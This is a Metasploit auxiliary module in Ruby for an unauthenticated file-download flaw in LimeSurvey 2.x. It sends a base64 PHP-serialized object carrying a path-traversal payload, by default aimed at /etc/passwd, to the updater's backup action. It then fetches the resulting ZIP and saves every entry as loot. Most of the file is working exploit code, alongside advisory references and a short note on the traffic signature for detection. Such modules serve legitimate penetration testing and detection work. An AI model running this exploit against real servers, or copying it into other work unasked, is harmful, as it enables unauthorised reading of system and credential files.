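##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# for extracting files
require 'zip'

# LimeSurvey unauthenticated file download (auxiliary module).
#
# Flow (see #run): one POST to the updater's backup action carrying a
# PHP-serialized CMultiFileUpload object whose `file` attribute is a
# traversal path, then a GET of the backup ZIP the server links to in its
# response. Every ZIP entry is printed and stored as loot.
#
# Defensive note: the traffic this module produces is an unauthenticated POST
# to index.php/admin/update/sa/backup with a base64 `datasupdateinfo` field
# and a self-chosen YII_CSRF_TOKEN cookie/field pair, followed by a GET of the
# linked backup archive; that request shape is what a detection rule would
# key on.
class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HttpClient

  # Matches the updater's success page. Capture 1 is the server-side path
  # the page reports, capture 2 is the href of the "Download this file" link.
  DOWNLOAD_LINK_RE = %r{<div class="updater-background">\s+<p class="success " style="text-align: left;">\s+<strong>[^<]+</strong>\s+<br/>\s+([^<]+)<br/>\s+<a class="btn btn-success" href="([^"]+)" title="Download this file">Download this file</a>}

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Limesurvey Unauthenticated File Download',
        'Description' => %q{
          This module exploits an unauthenticated file download vulnerability
          in limesurvey between 2.0+ and 2.06+ Build 151014. The file is downloaded
          as a ZIP and unzipped automatically, thus binary files can be downloaded.
        },
        'Author' => [
          'Pichaya Morimoto', # Vulnerability Discovery
          'Christian Mehlmauer' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['URL', 'https://sec-consult.com/vulnerability-lab/advisory/multiple-critical-vulnerabilities-in-lime-survey/'],
          ['URL', 'https://www.limesurvey.org/blog/22-security/136-limesurvey-security-advisory-10-2015'],
          ['URL', 'https://github.com/LimeSurvey/LimeSurvey/compare/2.06_plus_151014...2.06_plus_151016?w=1']
        ],
        'DisclosureDate' => '2015-10-12'
      )
    )

    register_options(
      [
        Opt::RPORT(80),
        OptString.new('TARGETURI', [true, 'The base path to the limesurvey installation', '/']),
        OptString.new('FILEPATH', [true, 'Path of the file to download', '/etc/passwd']),
        OptInt.new('TRAVERSAL_DEPTH', [true, 'Traversal depth', 15])
      ]
    )
  end

  # @return [String] the remote path to fetch (FILEPATH option)
  def filepath
    datastore['FILEPATH']
  end

  # @return [Integer] number of "/.." segments prepended to FILEPATH
  #   (TRAVERSAL_DEPTH option)
  def traversal_depth
    datastore['TRAVERSAL_DEPTH']
  end

  # Builds the `datasupdateinfo` form value: a PHP-serialized
  # CMultiFileUpload object whose `file` attribute is the traversal path,
  # base64-encoded.
  #
  # @return [String] base64 of the serialized object
  def payload
    file = "#{'/..' * traversal_depth}#{filepath}"
    # The s:<n> field is the serialized string length; kept as
    # String#length (characters), exactly as the original module computed it.
    serialized = "a:1:{i:0;O:16:\"CMultiFileUpload\":1:{s:4:\"file\";s:#{file.length}:\"#{file}\";}}"
    Rex::Text.encode_base64(serialized)
  end

  # Extracts every entry of an in-memory ZIP into a Hash.
  #
  # Entry names are chosen by the remote server; they are only used as Hash
  # keys here (and later as loot name hints), never as local write paths.
  #
  # @param zipfile [String] raw ZIP bytes
  # @return [Hash{String => String}] expanded entry name => entry contents.
  #   On a Zip::Error the error is printed and whatever was extracted so far
  #   is returned (possibly empty).
  def unzip_file(zipfile)
    zip_data = {}
    Zip::File.open_buffer(zipfile) do |archive|
      archive.each do |entry|
        zip_data[::File.expand_path(entry.name)] = archive.read(entry)
      end
    end
    zip_data
  rescue Zip::Error => e
    print_error("Error extracting ZIP: #{e}")
    zip_data
  end

  # Triggers the backup, follows the download link the server returns,
  # unzips the archive and stores each entry as loot.
  #
  # @return [void]
  def run
    link = request_backup_link
    return unless link

    reported_path, download_url = link
    print_status("File saved to #{reported_path}")
    print_status("Downloading backup from URL #{download_url}")

    archive = download_backup(download_url)
    unless archive
      print_error('Failed to download file')
      return
    end

    store_entries(unzip_file(archive))
  end

  private

  # POSTs the crafted update form and parses the resulting success page.
  # Prints a specific error for each way the response can fall short so the
  # operator can tell a non-vulnerable target from a parse failure.
  #
  # @return [Array(String, String), nil] [reported server path, download href],
  #   or nil when the response is not the expected success page
  def request_backup_link
    csrf_token = Rex::Text.rand_text_alpha(10)

    # The same self-generated token is sent as cookie and as form field;
    # presumably that pair is what the application's CSRF check compares.
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri, 'index.php', 'admin', 'update', 'sa', 'backup'),
      'cookie' => "YII_CSRF_TOKEN=#{csrf_token}",
      'vars_post' => {
        'YII_CSRF_TOKEN' => csrf_token,
        'destinationBuild' => Rex::Text.rand_text_alpha(5),
        'datasupdateinfo' => payload
      }
    )

    unless res && res.code == 200 && res.body && res.body.include?('Download this file')
      print_error('Failed to download file (backup request did not return a download link)')
      return nil
    end

    match = res.body.match(DOWNLOAD_LINK_RE)
    unless match
      print_error('Failed to download file (could not parse the download link)')
      return nil
    end

    [match[1], match[2]]
  end

  # GETs the backup archive the server linked to.
  #
  # @param download_url [String] href taken from the server's response.
  #   It is passed as the 'uri' of send_request_cgi, i.e. requested against
  #   the configured RHOST/RPORT — NOTE(review): confirm HttpClient does not
  #   treat a full URL here as a redirect to another host.
  # @return [String, nil] the response body on HTTP 200, nil otherwise
  def download_backup(download_url)
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => download_url
    )
    return nil unless res && res.code == 200

    res.body
  end

  # Prints each extracted entry and stores it as loot.
  #
  # @param entries [Hash{String => String}] as returned by #unzip_file
  # @return [void]
  def store_entries(entries)
    entries.each do |filename, content|
      print_good("Filename: #{filename}")
      print_good(content)

      # The server-chosen name is only a filename hint to store_loot, which
      # writes under the framework's loot directory (presumably after
      # sanitizing the name — verify against store_loot).
      path = store_loot(
        'limesurvey.http',
        'application/octet-stream',
        rhost,
        content,
        filename
      )
      print_good("File saved in: #{path}")
    end
  end
end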